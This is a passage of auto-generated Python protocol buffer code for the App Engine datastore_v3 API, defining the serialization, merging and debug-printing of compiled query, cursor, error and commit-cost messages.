    self.clear_mergejoinscan()
    self.clear_index_def()
    self.clear_offset()
    self.clear_limit()
    self.clear_keys_only()
    self.clear_property_name()
    self.clear_distinct_infix_size()
    self.clear_entityfilter()
    self.clear_plan_label()

  def OutputUnchecked(self, out):
    out.putVarInt32(11)
    self.primaryscan_.OutputUnchecked(out)
    out.putVarInt32(12)
    for i in xrange(len(self.mergejoinscan_)):
      out.putVarInt32(59)
      self.mergejoinscan_[i].OutputUnchecked(out)
      out.putVarInt32(60)
    if (self.has_offset_):
      out.putVarInt32(80)
      out.putVarInt32(self.offset_)
    if (self.has_limit_):
      out.putVarInt32(88)
      out.putVarInt32(self.limit_)
    out.putVarInt32(96)
    out.putBoolean(self.keys_only_)
    if (self.has_entityfilter_):
      out.putVarInt32(107)
      self.entityfilter_.OutputUnchecked(out)
      out.putVarInt32(108)
    if (self.has_index_def_):
      out.putVarInt32(170)
      out.putVarInt32(self.index_def_.ByteSize())
      self.index_def_.OutputUnchecked(out)
    for i in xrange(len(self.property_name_)):
      out.putVarInt32(194)
      out.putPrefixedString(self.property_name_[i])
    if (self.has_distinct_infix_size_):
      out.putVarInt32(200)
      out.putVarInt32(self.distinct_infix_size_)
    if (self.has_plan_label_):
      out.putVarInt32(210)
      out.putPrefixedString(self.plan_label_)

  def OutputPartial(self, out):
    if (self.has_primaryscan_):
      out.putVarInt32(11)
      self.primaryscan_.OutputPartial(out)
      out.putVarInt32(12)
    for i in xrange(len(self.mergejoinscan_)):
      out.putVarInt32(59)
      self.mergejoinscan_[i].OutputPartial(out)
      out.putVarInt32(60)
    if (self.has_offset_):
      out.putVarInt32(80)
      out.putVarInt32(self.offset_)
    if (self.has_limit_):
      out.putVarInt32(88)
      out.putVarInt32(self.limit_)
    if (self.has_keys_only_):
      out.putVarInt32(96)
      out.putBoolean(self.keys_only_)
    if (self.has_entityfilter_):
      out.putVarInt32(107)
      self.entityfilter_.OutputPartial(out)
      out.putVarInt32(108)
    if (self.has_index_def_):
      out.putVarInt32(170)
      out.putVarInt32(self.index_def_.ByteSizePartial())
      self.index_def_.OutputPartial(out)
    for i in xrange(len(self.property_name_)):
      out.putVarInt32(194)
      out.putPrefixedString(self.property_name_[i])
    if (self.has_distinct_infix_size_):
      out.putVarInt32(200)
      out.putVarInt32(self.distinct_infix_size_)
    if (self.has_plan_label_):
      out.putVarInt32(210)
      out.putPrefixedString(self.plan_label_)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 11:
        self.mutable_primaryscan().TryMerge(d)
        continue
      if tt == 59:
        self.add_mergejoinscan().TryMerge(d)
        continue
      if tt == 80:
        self.set_offset(d.getVarInt32())
        continue
      if tt == 88:
        self.set_limit(d.getVarInt32())
        continue
      if tt == 96:
        self.set_keys_only(d.getBoolean())
        continue
      if tt == 107:
        self.mutable_entityfilter().TryMerge(d)
        continue
      if tt == 170:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_index_def().TryMerge(tmp)
        continue
      if tt == 194:
        self.add_property_name(d.getPrefixedString())
        continue
      if tt == 200:
        self.set_distinct_infix_size(d.getVarInt32())
        continue
      if tt == 210:
        self.set_plan_label(d.getPrefixedString())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_primaryscan_:
      res+=prefix+"PrimaryScan {\n"
      res+=self.primaryscan_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
    cnt=0
    for e in self.mergejoinscan_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("MergeJoinScan%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    if self.has_index_def_:
      res+=prefix+"index_def <\n"
      res+=self.index_def_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_offset_: res+=prefix+("offset: %s\n" % self.DebugFormatInt32(self.offset_))
    if self.has_limit_: res+=prefix+("limit: %s\n" % self.DebugFormatInt32(self.limit_))
    if self.has_keys_only_: res+=prefix+("keys_only: %s\n" % self.DebugFormatBool(self.keys_only_))
    cnt=0
    for e in self.property_name_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("property_name%s: %s\n" % (elm, self.DebugFormatString(e)))
      cnt+=1
    if self.has_distinct_infix_size_: res+=prefix+("distinct_infix_size: %s\n" % self.DebugFormatInt32(self.distinct_infix_size_))
    if self.has_entityfilter_:
      res+=prefix+"EntityFilter {\n"
      res+=self.entityfilter_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
    if self.has_plan_label_: res+=prefix+("plan_label: %s\n" % self.DebugFormatString(self.plan_label_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kPrimaryScanGroup = 1
  kPrimaryScanindex_name = 2
  kPrimaryScanstart_key = 3
  kPrimaryScanstart_inclusive = 4
  kPrimaryScanend_key = 5
  kPrimaryScanend_inclusive = 6
  kPrimaryScanstart_postfix_value = 22
  kPrimaryScanend_postfix_value = 23
  kPrimaryScanend_unapplied_log_timestamp_us = 19
  kMergeJoinScanGroup = 7
  kMergeJoinScanindex_name = 8
  kMergeJoinScanprefix_value = 9
  kMergeJoinScanvalue_prefix = 20
  kindex_def = 21
  koffset = 10
  klimit = 11
  kkeys_only = 12
  kproperty_name = 24
  kdistinct_infix_size = 25
  kEntityFilterGroup = 13
  kEntityFilterdistinct = 14
  kEntityFilterkind = 17
  kEntityFilterancestor = 18
  kplan_label = 26

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "PrimaryScan",
    2: "index_name",
    3: "start_key",
    4: "start_inclusive",
    5: "end_key",
    6: "end_inclusive",
    7: "MergeJoinScan",
    8: "index_name",
    9: "prefix_value",
    10: "offset",
    11: "limit",
    12: "keys_only",
    13: "EntityFilter",
    14: "distinct",
    17: "kind",
    18: "ancestor",
    19: "end_unapplied_log_timestamp_us",
    20: "value_prefix",
    21: "index_def",
    22: "start_postfix_value",
    23: "end_postfix_value",
    24: "property_name",
    25: "distinct_infix_size",
    26: "plan_label",
  }, 26)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STARTGROUP,
    2: ProtocolBuffer.Encoder.STRING,
    3: ProtocolBuffer.Encoder.STRING,
    4: ProtocolBuffer.Encoder.NUMERIC,
    5: ProtocolBuffer.Encoder.STRING,
    6: ProtocolBuffer.Encoder.NUMERIC,
    7: ProtocolBuffer.Encoder.STARTGROUP,
    8: ProtocolBuffer.Encoder.STRING,
    9: ProtocolBuffer.Encoder.STRING,
    10: ProtocolBuffer.Encoder.NUMERIC,
    11: ProtocolBuffer.Encoder.NUMERIC,
    12: ProtocolBuffer.Encoder.NUMERIC,
    13: ProtocolBuffer.Encoder.STARTGROUP,
    14: ProtocolBuffer.Encoder.NUMERIC,
    17: ProtocolBuffer.Encoder.STRING,
    18: ProtocolBuffer.Encoder.STRING,
    19: ProtocolBuffer.Encoder.NUMERIC,
    20: ProtocolBuffer.Encoder.NUMERIC,
    21: ProtocolBuffer.Encoder.STRING,
    22: ProtocolBuffer.Encoder.STRING,
    23: ProtocolBuffer.Encoder.STRING,
    24: ProtocolBuffer.Encoder.STRING,
    25: ProtocolBuffer.Encoder.NUMERIC,
    26: ProtocolBuffer.Encoder.STRING,
  }, 26, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.CompiledQuery'
class CompiledCursor_PositionIndexValue(ProtocolBuffer.ProtocolMessage):
  has_property_ = 0
  property_ = ""
  has_value_ = 0

  def __init__(self, contents=None):
    self.value_ = PropertyValue()
    if contents is not None: self.MergeFromString(contents)

  def property(self): return self.property_

  def set_property(self, x):
    self.has_property_ = 1
    self.property_ = x

  def clear_property(self):
    if self.has_property_:
      self.has_property_ = 0
      self.property_ = ""

  def has_property(self): return self.has_property_

  def value(self): return self.value_

  def mutable_value(self): self.has_value_ = 1; return self.value_

  def clear_value(self):self.has_value_ = 0; self.value_.Clear()

  def has_value(self): return self.has_value_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_property()): self.set_property(x.property())
    if (x.has_value()): self.mutable_value().MergeFrom(x.value())

  def Equals(self, x):
    if x is self: return 1
    if self.has_property_ != x.has_property_: return 0
    if self.has_property_ and self.property_ != x.property_: return 0
    if self.has_value_ != x.has_value_: return 0
    if self.has_value_ and self.value_ != x.value_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (not self.has_value_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: value not set.')
    elif not self.value_.IsInitialized(debug_strs): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_property_): n += 2 + self.lengthString(len(self.property_))
    n += self.lengthString(self.value_.ByteSize())
    return n + 2

  def ByteSizePartial(self):
    n = 0
    if (self.has_property_): n += 2 + self.lengthString(len(self.property_))
    if (self.has_value_):
      n += 2
      n += self.lengthString(self.value_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_property()
    self.clear_value()

  def OutputUnchecked(self, out):
    if (self.has_property_):
      out.putVarInt32(242)
      out.putPrefixedString(self.property_)
    out.putVarInt32(250)
    out.putVarInt32(self.value_.ByteSize())
    self.value_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_property_):
      out.putVarInt32(242)
      out.putPrefixedString(self.property_)
    if (self.has_value_):
      out.putVarInt32(250)
      out.putVarInt32(self.value_.ByteSizePartial())
      self.value_.OutputPartial(out)

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 236: break
      if tt == 242:
        self.set_property(d.getPrefixedString())
        continue
      if tt == 250:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_value().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_property_: res+=prefix+("property: %s\n" % self.DebugFormatString(self.property_))
    if self.has_value_:
      res+=prefix+"value <\n"
      res+=self.value_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res

class CompiledCursor_Position(ProtocolBuffer.ProtocolMessage):
  has_start_key_ = 0
  start_key_ = ""
  has_key_ = 0
  key_ = None
  has_start_inclusive_ = 0
  start_inclusive_ = 1
  has_before_ascending_ = 0
  before_ascending_ = 0

  def __init__(self, contents=None):
    self.indexvalue_ = []
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def start_key(self): return self.start_key_

  def set_start_key(self, x):
    self.has_start_key_ = 1
    self.start_key_ = x

  def clear_start_key(self):
    if self.has_start_key_:
      self.has_start_key_ = 0
      self.start_key_ = ""

  def has_start_key(self): return self.has_start_key_

  def indexvalue_size(self): return len(self.indexvalue_)
  def indexvalue_list(self): return self.indexvalue_

  def indexvalue(self, i):
    return self.indexvalue_[i]

  def mutable_indexvalue(self, i):
    return self.indexvalue_[i]

  def add_indexvalue(self):
    x = CompiledCursor_PositionIndexValue()
    self.indexvalue_.append(x)
    return x

  def clear_indexvalue(self):
    self.indexvalue_ = []
  def key(self):
    if self.key_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.key_ is None: self.key_ = Reference()
      finally:
        self.lazy_init_lock_.release()
    return self.key_

  def mutable_key(self): self.has_key_ = 1; return self.key()

  def clear_key(self):

    if self.has_key_:
      self.has_key_ = 0;
      if self.key_ is not None: self.key_.Clear()

  def has_key(self): return self.has_key_

  def start_inclusive(self): return self.start_inclusive_

  def set_start_inclusive(self, x):
    self.has_start_inclusive_ = 1
    self.start_inclusive_ = x

  def clear_start_inclusive(self):
    if self.has_start_inclusive_:
      self.has_start_inclusive_ = 0
      self.start_inclusive_ = 1

  def has_start_inclusive(self): return self.has_start_inclusive_

  def before_ascending(self): return self.before_ascending_

  def set_before_ascending(self, x):
    self.has_before_ascending_ = 1
    self.before_ascending_ = x

  def clear_before_ascending(self):
    if self.has_before_ascending_:
      self.has_before_ascending_ = 0
      self.before_ascending_ = 0

  def has_before_ascending(self): return self.has_before_ascending_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_start_key()): self.set_start_key(x.start_key())
    for i in xrange(x.indexvalue_size()): self.add_indexvalue().CopyFrom(x.indexvalue(i))
    if (x.has_key()): self.mutable_key().MergeFrom(x.key())
    if (x.has_start_inclusive()): self.set_start_inclusive(x.start_inclusive())
    if (x.has_before_ascending()): self.set_before_ascending(x.before_ascending())

  def Equals(self, x):
    if x is self: return 1
    if self.has_start_key_ != x.has_start_key_: return 0
    if self.has_start_key_ and self.start_key_ != x.start_key_: return 0
    if len(self.indexvalue_) != len(x.indexvalue_): return 0
    for e1, e2 in zip(self.indexvalue_, x.indexvalue_):
      if e1 != e2: return 0
    if self.has_key_ != x.has_key_: return 0
    if self.has_key_ and self.key_ != x.key_: return 0
    if self.has_start_inclusive_ != x.has_start_inclusive_: return 0
    if self.has_start_inclusive_ and self.start_inclusive_ != x.start_inclusive_: return 0
    if self.has_before_ascending_ != x.has_before_ascending_: return 0
    if self.has_before_ascending_ and self.before_ascending_ != x.before_ascending_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    for p in self.indexvalue_:
      if not p.IsInitialized(debug_strs): initialized=0
    if (self.has_key_ and not self.key_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_start_key_): n += 2 + self.lengthString(len(self.start_key_))
    n += 4 * len(self.indexvalue_)
    for i in xrange(len(self.indexvalue_)): n += self.indexvalue_[i].ByteSize()
    if (self.has_key_): n += 2 + self.lengthString(self.key_.ByteSize())
    if (self.has_start_inclusive_): n += 3
    if (self.has_before_ascending_): n += 3
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_start_key_): n += 2 + self.lengthString(len(self.start_key_))
    n += 4 * len(self.indexvalue_)
    for i in xrange(len(self.indexvalue_)): n += self.indexvalue_[i].ByteSizePartial()
    if (self.has_key_): n += 2 + self.lengthString(self.key_.ByteSizePartial())
    if (self.has_start_inclusive_): n += 3
    if (self.has_before_ascending_): n += 3
    return n

  def Clear(self):
    self.clear_start_key()
    self.clear_indexvalue()
    self.clear_key()
    self.clear_start_inclusive()
    self.clear_before_ascending()

  def OutputUnchecked(self, out):
    if (self.has_start_key_):
      out.putVarInt32(218)
      out.putPrefixedString(self.start_key_)
    if (self.has_start_inclusive_):
      out.putVarInt32(224)
      out.putBoolean(self.start_inclusive_)
    for i in xrange(len(self.indexvalue_)):
      out.putVarInt32(235)
      self.indexvalue_[i].OutputUnchecked(out)
      out.putVarInt32(236)
    if (self.has_key_):
      out.putVarInt32(258)
      out.putVarInt32(self.key_.ByteSize())
      self.key_.OutputUnchecked(out)
    if (self.has_before_ascending_):
      out.putVarInt32(264)
      out.putBoolean(self.before_ascending_)

  def OutputPartial(self, out):
    if (self.has_start_key_):
      out.putVarInt32(218)
      out.putPrefixedString(self.start_key_)
    if (self.has_start_inclusive_):
      out.putVarInt32(224)
      out.putBoolean(self.start_inclusive_)
    for i in xrange(len(self.indexvalue_)):
      out.putVarInt32(235)
      self.indexvalue_[i].OutputPartial(out)
      out.putVarInt32(236)
    if (self.has_key_):
      out.putVarInt32(258)
      out.putVarInt32(self.key_.ByteSizePartial())
      self.key_.OutputPartial(out)
    if (self.has_before_ascending_):
      out.putVarInt32(264)
      out.putBoolean(self.before_ascending_)

  def TryMerge(self, d):
    while 1:
      tt = d.getVarInt32()
      if tt == 20: break
      if tt == 218:
        self.set_start_key(d.getPrefixedString())
        continue
      if tt == 224:
        self.set_start_inclusive(d.getBoolean())
        continue
      if tt == 235:
        self.add_indexvalue().TryMerge(d)
        continue
      if tt == 258:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_key().TryMerge(tmp)
        continue
      if tt == 264:
        self.set_before_ascending(d.getBoolean())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_start_key_: res+=prefix+("start_key: %s\n" % self.DebugFormatString(self.start_key_))
    cnt=0
    for e in self.indexvalue_:
      elm=""
      if printElemNumber: elm="(%d)" % cnt
      res+=prefix+("IndexValue%s {\n" % elm)
      res+=e.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
      cnt+=1
    if self.has_key_:
      res+=prefix+"key <\n"
      res+=self.key_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_start_inclusive_: res+=prefix+("start_inclusive: %s\n" % self.DebugFormatBool(self.start_inclusive_))
    if self.has_before_ascending_: res+=prefix+("before_ascending: %s\n" % self.DebugFormatBool(self.before_ascending_))
    return res

class CompiledCursor(ProtocolBuffer.ProtocolMessage):
  has_position_ = 0
  position_ = None
  has_postfix_position_ = 0
  postfix_position_ = None
  has_absolute_position_ = 0
  absolute_position_ = None

  def __init__(self, contents=None):
    self.lazy_init_lock_ = thread.allocate_lock()
    if contents is not None: self.MergeFromString(contents)

  def position(self):
    if self.position_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.position_ is None: self.position_ = CompiledCursor_Position()
      finally:
        self.lazy_init_lock_.release()
    return self.position_

  def mutable_position(self): self.has_position_ = 1; return self.position()

  def clear_position(self):

    if self.has_position_:
      self.has_position_ = 0;
      if self.position_ is not None: self.position_.Clear()

  def has_position(self): return self.has_position_

  def postfix_position(self):
    if self.postfix_position_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.postfix_position_ is None: self.postfix_position_ = IndexPostfix()
      finally:
        self.lazy_init_lock_.release()
    return self.postfix_position_

  def mutable_postfix_position(self): self.has_postfix_position_ = 1; return self.postfix_position()

  def clear_postfix_position(self):

    if self.has_postfix_position_:
      self.has_postfix_position_ = 0;
      if self.postfix_position_ is not None: self.postfix_position_.Clear()

  def has_postfix_position(self): return self.has_postfix_position_

  def absolute_position(self):
    if self.absolute_position_ is None:
      self.lazy_init_lock_.acquire()
      try:
        if self.absolute_position_ is None: self.absolute_position_ = IndexPosition()
      finally:
        self.lazy_init_lock_.release()
    return self.absolute_position_

  def mutable_absolute_position(self): self.has_absolute_position_ = 1; return self.absolute_position()

  def clear_absolute_position(self):

    if self.has_absolute_position_:
      self.has_absolute_position_ = 0;
      if self.absolute_position_ is not None: self.absolute_position_.Clear()

  def has_absolute_position(self): return self.has_absolute_position_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_position()): self.mutable_position().MergeFrom(x.position())
    if (x.has_postfix_position()): self.mutable_postfix_position().MergeFrom(x.postfix_position())
    if (x.has_absolute_position()): self.mutable_absolute_position().MergeFrom(x.absolute_position())

  def Equals(self, x):
    if x is self: return 1
    if self.has_position_ != x.has_position_: return 0
    if self.has_position_ and self.position_ != x.position_: return 0
    if self.has_postfix_position_ != x.has_postfix_position_: return 0
    if self.has_postfix_position_ and self.postfix_position_ != x.postfix_position_: return 0
    if self.has_absolute_position_ != x.has_absolute_position_: return 0
    if self.has_absolute_position_ and self.absolute_position_ != x.absolute_position_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (self.has_position_ and not self.position_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_postfix_position_ and not self.postfix_position_.IsInitialized(debug_strs)): initialized = 0
    if (self.has_absolute_position_ and not self.absolute_position_.IsInitialized(debug_strs)): initialized = 0
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_position_): n += 2 + self.position_.ByteSize()
    if (self.has_postfix_position_): n += 1 + self.lengthString(self.postfix_position_.ByteSize())
    if (self.has_absolute_position_): n += 1 + self.lengthString(self.absolute_position_.ByteSize())
    return n

  def ByteSizePartial(self):
    n = 0
    if (self.has_position_): n += 2 + self.position_.ByteSizePartial()
    if (self.has_postfix_position_): n += 1 + self.lengthString(self.postfix_position_.ByteSizePartial())
    if (self.has_absolute_position_): n += 1 + self.lengthString(self.absolute_position_.ByteSizePartial())
    return n

  def Clear(self):
    self.clear_position()
    self.clear_postfix_position()
    self.clear_absolute_position()

  def OutputUnchecked(self, out):
    if (self.has_postfix_position_):
      out.putVarInt32(10)
      out.putVarInt32(self.postfix_position_.ByteSize())
      self.postfix_position_.OutputUnchecked(out)
    if (self.has_position_):
      out.putVarInt32(19)
      self.position_.OutputUnchecked(out)
      out.putVarInt32(20)
    if (self.has_absolute_position_):
      out.putVarInt32(26)
      out.putVarInt32(self.absolute_position_.ByteSize())
      self.absolute_position_.OutputUnchecked(out)

  def OutputPartial(self, out):
    if (self.has_postfix_position_):
      out.putVarInt32(10)
      out.putVarInt32(self.postfix_position_.ByteSizePartial())
      self.postfix_position_.OutputPartial(out)
    if (self.has_position_):
      out.putVarInt32(19)
      self.position_.OutputPartial(out)
      out.putVarInt32(20)
    if (self.has_absolute_position_):
      out.putVarInt32(26)
      out.putVarInt32(self.absolute_position_.ByteSizePartial())
      self.absolute_position_.OutputPartial(out)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 10:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_postfix_position().TryMerge(tmp)
        continue
      if tt == 19:
        self.mutable_position().TryMerge(d)
        continue
      if tt == 26:
        length = d.getVarInt32()
        tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
        d.skip(length)
        self.mutable_absolute_position().TryMerge(tmp)
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_position_:
      res+=prefix+"Position {\n"
      res+=self.position_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+"}\n"
    if self.has_postfix_position_:
      res+=prefix+"postfix_position <\n"
      res+=self.postfix_position_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    if self.has_absolute_position_:
      res+=prefix+"absolute_position <\n"
      res+=self.absolute_position_.__str__(prefix + "  ", printElemNumber)
      res+=prefix+">\n"
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kPositionGroup = 2
  kPositionstart_key = 27
  kPositionIndexValueGroup = 29
  kPositionIndexValueproperty = 30
  kPositionIndexValuevalue = 31
  kPositionkey = 32
  kPositionstart_inclusive = 28
  kPositionbefore_ascending = 33
  kpostfix_position = 1
  kabsolute_position = 3

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "postfix_position",
    2: "Position",
    3: "absolute_position",
    27: "start_key",
    28: "start_inclusive",
    29: "IndexValue",
    30: "property",
    31: "value",
    32: "key",
    33: "before_ascending",
  }, 33)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.STRING,
    2: ProtocolBuffer.Encoder.STARTGROUP,
    3: ProtocolBuffer.Encoder.STRING,
    27: ProtocolBuffer.Encoder.STRING,
    28: ProtocolBuffer.Encoder.NUMERIC,
    29: ProtocolBuffer.Encoder.STARTGROUP,
    30: ProtocolBuffer.Encoder.STRING,
    31: ProtocolBuffer.Encoder.STRING,
    32: ProtocolBuffer.Encoder.STRING,
    33: ProtocolBuffer.Encoder.NUMERIC,
  }, 33, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.CompiledCursor'
class Cursor(ProtocolBuffer.ProtocolMessage):
  has_cursor_ = 0
  cursor_ = 0
  has_app_ = 0
  app_ = ""

  def __init__(self, contents=None):
    if contents is not None: self.MergeFromString(contents)

  def cursor(self): return self.cursor_

  def set_cursor(self, x):
    self.has_cursor_ = 1
    self.cursor_ = x

  def clear_cursor(self):
    if self.has_cursor_:
      self.has_cursor_ = 0
      self.cursor_ = 0

  def has_cursor(self): return self.has_cursor_

  def app(self): return self.app_

  def set_app(self, x):
    self.has_app_ = 1
    self.app_ = x

  def clear_app(self):
    if self.has_app_:
      self.has_app_ = 0
      self.app_ = ""

  def has_app(self): return self.has_app_


  def MergeFrom(self, x):
    assert x is not self
    if (x.has_cursor()): self.set_cursor(x.cursor())
    if (x.has_app()): self.set_app(x.app())

  def Equals(self, x):
    if x is self: return 1
    if self.has_cursor_ != x.has_cursor_: return 0
    if self.has_cursor_ and self.cursor_ != x.cursor_: return 0
    if self.has_app_ != x.has_app_: return 0
    if self.has_app_ and self.app_ != x.app_: return 0
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    if (not self.has_cursor_):
      initialized = 0
      if debug_strs is not None:
        debug_strs.append('Required field: cursor not set.')
    return initialized

  def ByteSize(self):
    n = 0
    if (self.has_app_): n += 1 + self.lengthString(len(self.app_))
    return n + 9

  def ByteSizePartial(self):
    n = 0
    if (self.has_cursor_):
      n += 9
    if (self.has_app_): n += 1 + self.lengthString(len(self.app_))
    return n

  def Clear(self):
    self.clear_cursor()
    self.clear_app()

  def OutputUnchecked(self, out):
    out.putVarInt32(9)
    out.put64(self.cursor_)
    if (self.has_app_):
      out.putVarInt32(18)
      out.putPrefixedString(self.app_)

  def OutputPartial(self, out):
    if (self.has_cursor_):
      out.putVarInt32(9)
      out.put64(self.cursor_)
    if (self.has_app_):
      out.putVarInt32(18)
      out.putPrefixedString(self.app_)

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()
      if tt == 9:
        self.set_cursor(d.get64())
        continue
      if tt == 18:
        self.set_app(d.getPrefixedString())
        continue


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    if self.has_cursor_: res+=prefix+("cursor: %s\n" % self.DebugFormatFixed64(self.cursor_))
    if self.has_app_: res+=prefix+("app: %s\n" % self.DebugFormatString(self.app_))
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])

  kcursor = 1
  kapp = 2

  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
    1: "cursor",
    2: "app",
  }, 2)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
    1: ProtocolBuffer.Encoder.DOUBLE,
    2: ProtocolBuffer.Encoder.STRING,
  }, 2, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Cursor'
class Error(ProtocolBuffer.ProtocolMessage):


  BAD_REQUEST  =    1
  CONCURRENT_TRANSACTION =    2
  INTERNAL_ERROR =    3
  NEED_INDEX   =    4
  TIMEOUT      =    5
  PERMISSION_DENIED =    6
  BIGTABLE_ERROR =    7
  COMMITTED_BUT_STILL_APPLYING =    8
  CAPABILITY_DISABLED =    9
  TRY_ALTERNATE_BACKEND =   10
  SAFE_TIME_TOO_OLD =   11

  _ErrorCode_NAMES = {
    1: "BAD_REQUEST",
    2: "CONCURRENT_TRANSACTION",
    3: "INTERNAL_ERROR",
    4: "NEED_INDEX",
    5: "TIMEOUT",
    6: "PERMISSION_DENIED",
    7: "BIGTABLE_ERROR",
    8: "COMMITTED_BUT_STILL_APPLYING",
    9: "CAPABILITY_DISABLED",
    10: "TRY_ALTERNATE_BACKEND",
    11: "SAFE_TIME_TOO_OLD",
  }

  def ErrorCode_Name(cls, x): return cls._ErrorCode_NAMES.get(x, "")
  ErrorCode_Name = classmethod(ErrorCode_Name)


  def __init__(self, contents=None):
    pass
    if contents is not None: self.MergeFromString(contents)


  def MergeFrom(self, x):
    assert x is not self

  def Equals(self, x):
    if x is self: return 1
    return 1

  def IsInitialized(self, debug_strs=None):
    initialized = 1
    return initialized

  def ByteSize(self):
    n = 0
    return n

  def ByteSizePartial(self):
    n = 0
    return n

  def Clear(self):
    pass

  def OutputUnchecked(self, out):
    pass

  def OutputPartial(self, out):
    pass

  def TryMerge(self, d):
    while d.avail() > 0:
      tt = d.getVarInt32()


      if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
      d.skipData(tt)


  def __str__(self, prefix="", printElemNumber=0):
    res=""
    return res


  def _BuildTagLookupTable(sparse, maxtag, default=None):
    return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])


  _TEXT = _BuildTagLookupTable({
    0: "ErrorCode",
  }, 0)

  _TYPES = _BuildTagLookupTable({
    0: ProtocolBuffer.Encoder.NUMERIC,
  }, 0, ProtocolBuffer.Encoder.MAX_TYPE)


  _STYLE = """"""
  _STYLE_CONTENT_TYPE = """"""
  _PROTO_DESCRIPTOR_NAME = 'apphosting_datastore_v3.Error'
class Cost_CommitCost(ProtocolBuffer.ProtocolMessage):
  has_requested_entity_puts_ = 0
  requested_entity_puts_ = 0
  has_requested_entity_deletes_ = 0
  requested_entity_deletes_ = 0

  def __init__(self, contents=None):
    if contents is not None: self.MergeFromString(contents)

  def requested_entity_puts(self): return self.requested_entity_puts_

  def set_requested_entity_puts(self, x):
    self.has_requested_entity_puts_ = 1
